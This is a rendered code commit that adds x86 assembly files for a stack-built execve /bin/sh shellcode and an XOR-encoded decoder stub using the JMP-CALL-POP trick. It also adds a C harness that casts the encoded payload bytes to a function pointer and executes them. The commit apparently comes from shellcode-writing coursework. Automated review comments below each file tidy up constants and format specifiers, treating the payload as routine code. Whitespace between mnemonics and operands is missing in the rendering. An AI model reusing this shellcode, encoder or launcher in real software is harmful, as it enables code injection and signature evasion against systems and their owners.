Commit f1801a4

Add files via upload
1 parent 2829157 commit f1801a4

8 files changed

+89
-0
lines changed

536 Bytes
Binary file not shown.
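--- /dev/null
+++ b/Execve-stack.nasm
@@ -0,0 +1,39 @@
+; Execve-stack.nasm
+; Author: Kunal Varudkar
+
+; Purpose: Developing /bin/sh shellcode using stack
+
+
+global _start
+
+section .text
+
+_start:
+
+
+; push Null dword on the stack
+xoreax,eax
+pusheax
+
+; push //bin/sh in reverse order to stack (strlen=even)
+push0x68732f6e
+push0x69622f2f
+
+; Moving //bin/sh to ebx register
+movebx,esp
+
+; push Null on stack
+pusheax
+
+; pointing esp to edx (envp[]=NULL)
+movedx,esp
+
+; push the address of //bin/sh stored in ebx
+pushebx
+
+; point the top tof the stack to ECX[argv[]]
+movecx,esp
+
+; call syscall
+moval,0xb ; or 11
+int0x80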
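Review bot: The `mov al,0xb` on line 38 only yields the intended syscall number because `eax` was zeroed by `xor eax,eax` on line 15 and nothing in between writes it; that invariant is what makes the one-byte `al` write safe and it is undocumented, so add `; eax upper bytes still zero from the xor above; al alone selects execve (11)`. The comment on line 28 states the data flow backwards (`mov edx,esp` copies esp into edx) and line 34 has the typo `tof`; suggest `; edx = esp (envp[] = NULL)` and `; ecx = esp (argv[] = {&"//bin/sh", NULL})`. As rendered, mnemonics and operands are run together (`xoreax,eax`, `moval,0xb`); if the committed file really lacks the separating whitespace NASM will reject those lines, so this is worth confirming against the raw file rather than the rendered view.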
464 Bytes
Binary file not shown.
656 Bytes
Binary file not shown.
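--- /dev/null
+++ b/XOR-Decoder.nasm
@@ -0,0 +1,34 @@
+; XOR-Decoder.nasm
+; Author: Kunal Varudkar
+
+; Purpose: Developing xor Decoder
+
+
+global _start
+
+section .text
+
+_start:
+
+jmp short call_decoder ;JMP-CALL-POP technique
+
+
+decoder:
+
+popesi ; get the memory address of shellcode in esi
+xorecx,ecx ; xor op to avoid bad character
+movcl,25 ; using ecx reg to use loop( length of shellcode=25)
+
+decode:
+; XOR-decoding
+xor byte [esi],0xAA ; xor each byte with 0xAA
+incesi ; Increment esi for next bytearray
+loop decode ; loop until ecx is zero
+
+jmp short shellcode ; ecx=0 goto shellcode(indicate decoding is done)
+
+call_decoder:
+
+call decoder
+; encoded shellcode
+shellcode: db 0x9b,0x6a,0xfa,0xc2,0xc4,0x85,0xd9,0xc2,0xc2,0x85,0x85,0xc8,0xc3,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a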
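Review bot: The byte count in `mov cl,25` on line 20 and the key in `xor byte [esi],0xAA` on line 24 are magic numbers that have to be kept in sync by hand with the `db` on line 34 (which does currently hold 25 bytes); a payload of a different length or key would silently under- or over-decode. Name them once at the top, `SHELLCODE_LEN equ 25` and `XOR_KEY equ 0xAA`, and use `mov cl, SHELLCODE_LEN` / `xor byte [esi], XOR_KEY` so the two places that must agree are visibly tied together. The loop on lines 24–26 also writes into the file's own `.text` bytes, so the routine only functions where that section is mapped writable; that assumption is not stated anywhere and belongs in the header comment, e.g. `; NOTE: decoder modifies its own .text in place — assumes the section is writable`.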
592 Bytes
Binary file not shown.
7.32 KB
Binary file not shown.
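--- /dev/null
+++ b/<C-HARNESS-PATH-NOT-ON-PAGE>.c
@@ -0,0 +1,16 @@
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x36\xaa\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x9b\x6a\xfa\xc2\xc4\x85\xd9\xc2\xc2\x85\x85\xc8\xc3\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
+
+
+main()
+{
+
+printf("Shellcode Length= %d\n", strlen(code));
+int (*ret)() = ( int (*)())code;
+
+ret();
+
+}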
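Review bot: The `printf` on line 11 passes the `size_t` result of `strlen(code)` to a `%d` conversion, which is undefined behaviour under the C standard and prints garbage on 64-bit targets where `size_t` is wider than `int`; use `printf("Shellcode Length= %zu\n", strlen(code));`. The `main()` on line 8 relies on implicit `int`, which has been invalid since C99 and is rejected by current compilers in default modes; declare it as `int main(void)` and end the function with `return 0;`. The `code[]` array on line 4 should carry a one-line comment stating what it contains, since the bytes are opaque to a reader and the comment in the companion `.nasm` file is the only place the payload is described.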
